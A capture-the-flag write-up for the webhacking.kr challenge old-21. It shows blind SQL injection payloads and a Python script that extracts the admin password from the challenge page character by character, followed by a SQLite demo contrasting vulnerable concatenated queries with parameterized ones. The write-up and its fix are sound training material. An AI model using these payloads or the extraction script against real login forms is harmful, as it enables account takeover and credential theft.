
[Webhacking.kr] old-21

chanchand 2023. 11. 2. 16:04

Problem

Solution


id:guest/pw:guest : login success

id:admin/pw:123 : login fail

id:admin'#/pw:123 : wrong password

 

The case where "wrong password" is returned can be used to perform a blind injection.

 

Password length

id : admin' and length(pw)>30# / pw : 123

Narrowing it down in this way,

id : admin' and length(pw)=36# / pw : 12

-> wrong password

we find that the password length is 36.

 

Password string

id : admin' and ascii(substr(pw,1,1))=116#

 

 

import requests

url = 'https://webhacking.kr/challenge/bonus-1/index.php'
cookie = {'PHPSESSID':'bmvg2k4nh4momseflhkh18371h'}

pw_len = 0

# Step 1: find the password length.
# "wrong password" in the response means the injected condition was true.
for i in range(100):
    payload = "?id=admin\'and%20length(pw)={}%23&pw=1".format(i)
    res = requests.get(url + payload, cookies=cookie)
    if "wrong password" in res.text:
        pw_len = i
        break

print(pw_len)

# Step 2: recover the password one character at a time.
# substr() positions are 1-based, so iterate from 1 to pw_len inclusive.
pw = ""
for i in range(1, pw_len + 1):
    # Try each printable ASCII code until the condition is true.
    for j in range(33, 128):
        payload = "?id=admin\'and%20ascii(substr(pw,{},1))={}%23&pw=1".format(i, j)
        res = requests.get(url + payload, cookies=cookie)
        if "wrong password" in res.text:
            pw += chr(j)
            print(pw)
            break

print("비밀번호 : {}".format(pw))
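
Why the three responses above work as a true/false oracle, and how bound parameters with a single failure message remove it, shown as an added example (not part of the original post and not the challenge's source code). The server logic, the table layout and the 36-character admin password are assumptions constructed to reproduce the observed responses; it uses in-memory SQLite, so the comment marker is -- instead of MySQL's #.

```python
import sqlite3

# Constructed stand-in for the challenge's user table (SQLite, in memory).
# The 36-character admin password is made up for this example.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id TEXT, pw TEXT)")
db.executemany("INSERT INTO users VALUES (?, ?)",
               [("guest", "guest"), ("admin", "x" * 36)])


def login_vulnerable(user_id, pw):
    """Assumed server logic: both inputs are concatenated into the SQL text."""
    sql = ("SELECT pw FROM users WHERE id='" + user_id +
           "' AND pw='" + pw + "'")
    row = db.execute(sql).fetchone()
    if row is None:
        return "login fail"
    # A row came back; a second check decides between two distinct messages.
    return "login success" if row[0] == pw else "wrong password"


def login_hardened(user_id, pw):
    """Bound parameters and one failure message: no boolean oracle remains."""
    # Real code would verify a salted password hash instead of plaintext.
    row = db.execute("SELECT pw FROM users WHERE id = ? AND pw = ?",
                     (user_id, pw)).fetchone()
    return "login success" if row is not None else "login fail"


def oracle_leaks(login):
    """True if a condition placed in the id field changes the response."""
    # SQLite comments start with "--"; the page's MySQL target uses "#".
    true_case = login("admin' and length(pw)=36--", "1")
    false_case = login("admin' and length(pw)=35--", "1")
    return true_case != false_case


if __name__ == "__main__":
    print("vulnerable leaks:", oracle_leaks(login_vulnerable))
    print("hardened leaks:  ", oracle_leaks(login_hardened))
```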
